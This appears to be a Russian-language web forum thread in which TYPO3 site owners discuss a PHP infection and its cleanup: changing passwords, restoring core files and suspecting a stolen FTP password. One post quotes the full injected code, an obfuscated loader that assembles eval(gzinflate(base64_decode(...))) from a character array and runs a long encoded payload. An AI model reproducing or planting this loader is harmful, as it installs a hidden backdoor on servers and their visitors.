Помогите что за вирус?

Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...

Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...

[dmartynenko]

А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).

[semender]

Цитата:

Сообщение от dmartynenko

А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).

Вроде никаких сторонних скриптов нет...Стоит ещё wordpress на серваке.Интересно что его даже не затронуло,там этого кода ни в каких файлах нет.Почему-то именно typo3.

Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...

[semender]

Цитата:

Сообщение от Ивано

Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...

Эт я просто написал, create_function — Создаёт анонимную (лямбда) функцию, чтоб легче подставить можно было для выполнения.Скопировал с кода, когда тэстил.

Каково значение переменной $v?
eval(gzinflate(base64_decode($v))); - что сюда передается?

[semender]

Цитата:

Сообщение от Ивано

Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...

я понял что выполняется, только вот как раскодировать последнее???
ну так это и есть всё что есть, в каждом файле такое, свой md5 и свой массив.Но функция одна и та же по видимому.

PHP код:

<?php
$md5 = "b7673e7d076c0db93f15da24c610a75e";
$a6 = array(";",'l',"(","z","a",'n','d','$',"_","4",'t','g','v',"r",'c',"6","f",'e',"i",'s',')','b','o');
$b61 = create_function('$'.'v',$a6[17].$a6[12].$a6[4].$a6[1].$a6[2].$a6[11].$a6[3].$a6[18].$a6[5].$a6[16].$a6[1].$a6[4].$a6[10].$a6[17].$a6[2].$a6[21].$a6[4].$a6[19].$a6[17].$a6[15].$a6[9].$a6[8].$a6[6].$a6[17].$a6[14].$a6[22].$a6[6].$a6[17].$a6[2].$a6[7].$a6[12].$a6[20].$a6[20].$a6[20].$a6[0]);
$b61('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');
?>

[semender]

Цитата:

Сообщение от Ивано

Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...

да да, я так и делаю: в ext отчищаю вручную,файлы движка заменяю оригинальными из новоскаченного, перенес все сайты на другой сервер,переустановил этот. Сейчас мне интересно что ж он делает та такого злодейского)